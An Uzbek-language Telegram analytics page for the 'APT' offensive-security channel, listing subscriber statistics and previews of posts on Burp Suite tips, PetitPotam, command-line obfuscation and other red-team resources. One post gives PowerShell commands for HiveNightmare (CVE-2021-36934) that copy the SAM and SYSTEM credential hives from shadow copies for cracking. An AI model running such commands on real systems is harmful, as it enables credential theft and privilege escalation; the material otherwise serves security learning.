APT

Kanalga Telegram’da o‘tish

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Ko'proq ko'rsatish

Rossiya45 464 Texnologiyalar & Aralashmalar8 844...

📈 Telegram kanali APT analitikasi

APT (@apt_notes) Ingliz til segmentidagi kanali faol ishtirokchi. Hozirda hamjamiyat 14 712 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 8 844-o'rinni va Rossiya mintaqasida 45 464-o'rinni egallagan.

📊 Auditoriya ko‘rsatkichlari va dinamika

невідомо sanasidan buyon loyiha tez o‘sib, 14 712 obunachiga ega bo‘ldi.

14 Iyun, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 432 ga, so‘nggi 24 soatda esa 26 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.

Tasdiqlash holati: Tasdiqlanmagan
Jalb etish (ER): Auditoriya o‘rtacha 51.64% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining N/A% ini tashkil etuvchi reaksiyalarni to‘playdi.
Post qamrovi: Har bir post o‘rtacha 7 592 marta ko‘riladi; birinchi sutkada odatda 0 ta ko‘rish yig‘iladi.
Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 20 ta reaksiya keladi.

📝 Tavsif va kontent siyosati

Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
“This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

Yuqori yangilanish chastotasi (oxirgi ma’lumot 15 Iyun, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.

14 712

Obunachilar

+2624 soatlar

+1137 kunlar

+43230 kunlar

7 592

Post ko'rishlar

Ma'lumot yo'q24 soatlar

Ma'lumot yo'q48 soatlar

51.64%

Muloqot nisbati

Ma'lumot yo'q

Kuniga postlar

Ads index

beta

Postlar arxiv

14 715

1/n [JAVA] - Download API interfaces from Burp -> Extender -> APIs -> Save Interface files. - Create a package name burp and save files there, you can choose any IDE of your choice. - Make IDE ready to build JAR. - Create file name BurpExtender and add the following code.

14 715

#BurpHacksForBounties - Day 22/30 🤓🤓 Create your own Burp Extender Plugin in 3 tweets with Java. Thank you Burp Suite for making it easy #infosec #appsec #burp @BurpSuiteGuide #bugbountytips #bugbountytip #security

14 715

Windows Command-Line Obfuscation Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables. # https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation #cheatsheet #cmd #pentest

14 715

Cheat sheet when designing offensive code Source: https://raw.githubusercontent.com/OTRF/API-To-Event/master/images/API-to-Sysmon.svg #redteam #sysmon

14 715

3/n Useful in : - Blind SQLi - SSRF - XSS - Detecting any out-of-bound source loads you can think of. - Evade firewall, incase outbound TCP requests are blocked and HTTP is allowed Read more at: https://portswigger.net/burp/documentation/collaborator

14 715

2/n Image 1 - Start Collaborator client Image 2 - Click copy a custom URL will be created with <>.burpcollaborator.net domain. - Use that URL in the payload Image 3 - Poll to see the request made on the URL. Image 4 - Req payload In my case: DNS, HTTP requests were made.

14 715

1/n when injection occurs with a payload that triggers interaction to some other site, to verify such scenarios this Collaborator comes in handy. Works on client-server model. The public server hosted by PortSwigger. Self-hosting is possible too. How to use a client? 👇🏻

14 715

#BurpHacksForBounties - Day 21/30 ❤️ Burp Collaborator ❤️ 🙈 Burp Suite Collaborator is a hosted network service offering from PortSwigger which is very useful in manual testing. See what, how, and why👇🏻

14 715

#BurpHacksForBounties - Tip 20/30 Burp Suite shortcut's cheat sheet by ChrisADale published on SANS. This pocket guide will increase your productivity. https://sansorg.egnyte.com/dd/x19ByeTOpS/

14 715

WINDOWS LPE "HiveNightmare" or "SeriousSAM"

CVE-2021-36934

The problem is aggravated by the fact the 'shadow copy' of the system drive where these files can be found is created when someone performs a Windows Update if that drive is larger than 128GB (!). So, even if your version of Windows 10 wasn't initially impacted, it could be after updating. 1) Check permissions:

icacls.exe C:\Windows\System32\config\SAM

2) Check shadow copies, restore points

[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM')

... and so on 3) Copy SAM and SYSTEM files from shadow copy:

[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', 'C:\Temp\SAM')
[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', 'C:\Temp\SYSTEM')

14 715

Plugin name: BurpBounty Scan Check Builder. It is fairly easy-to-use plugin. Install from BApp Store, create a check with simple name. Give it a severity, check enter the req/res you want to perform/check and enable it. ❤️

14 715

#BurpHacksForBounties - Tip 19/30 Adding your own scan rules to Burp Suite active/passive scanner. Include custom checks in scanner for #bugbounties without writing a single line of code. Using a plugin developed by @BurpBounty @egarme #infosec #appsec #burp #bugbountytips

14 715

🔥 HiveNightmare 🔥 Exploit allowing you to read registry hives and SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives as non-admin. This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves them in current directory as HIVENAME-haxx, for use with whatever cracking tools, or whatever, you want. https://github.com/GossiTheDog/HiveNightmare #redteam #pentest #vuln #nightmare

14 715

Burp Suite - ninja tricks https://owasp.org/www-chapter-norway/assets/files/Burp%20suite%20ninja%20moves.pdf #burp #tricks #BugBounty

14 715

1. Create a filter for intruder response. 2. Start the payload 3. If the response contains the string you entered in "grep" that will show up in an extra column. -> You can only focus on the response you are looking for.

14 715

#BurpHacksForBounties - Day 18/30 Do you want to filter the responses in Burp Suite Intruder? And only show the ones which have specific pattern present in response? If yes try this 👇🏻 🧵 #appsec #infosec #bugbountytips #bugbountytip #burp

14 715

PetitPotam PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function. https://github.com/topotam/PetitPotam #pentest #PetitPotam #rcp

14 715

Auditing Docker Security https://youtu.be/mQkVB6KMHCg #docker #autdit #security

14 715

Managing SSH Access at Scale with HashiCorp Vault Learn how to build scalable, role-based SSH access with SSH certificates and HashiCorp Vault. #vault

14 715

Let see this for blogspot.com, this is a reverse proxy setting that checks subdomains and routes them accordingly, now let's change the host for it. IMG 1 : Target = Host IMG 2 : Target != Host, but still the request is routed through the host.